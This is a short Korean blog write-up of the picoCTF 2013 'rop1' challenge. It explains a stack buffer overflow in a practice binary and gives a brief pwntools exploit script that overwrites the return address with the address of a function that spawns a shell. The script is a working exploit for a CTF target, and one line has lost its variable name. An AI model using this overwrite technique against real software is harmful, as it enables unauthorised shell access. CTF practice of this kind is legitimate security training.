CTF's Write-up

[pico CTF 2013] rop1

m0nd2y 2018. 8. 15. 22:17

pico ctf rop1번 문제입니다.


pico rop1


checksec 하고!




바이너리까보면 취약한 함수라고 손수 알려주는군요 ㅎㅎ

88만큼받는데 무려..100을 ㅎㅎ BOF



어떻게 rop를 만들까 생각해보니까 마침 부르지말라는 곳에 shell호출하는 함수가 있네요! :)





그냥 exploit하죠!!


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
 
 
= process("./pico_rop1")
system = 0x080484A4
 
 
payload = ""
 
 
 
 
payload += "A"*140
payload += p32(system)
 
r.send(payload)
r.interactive()
 
 
cs


(grin)




저작자표시 비영리 동일조건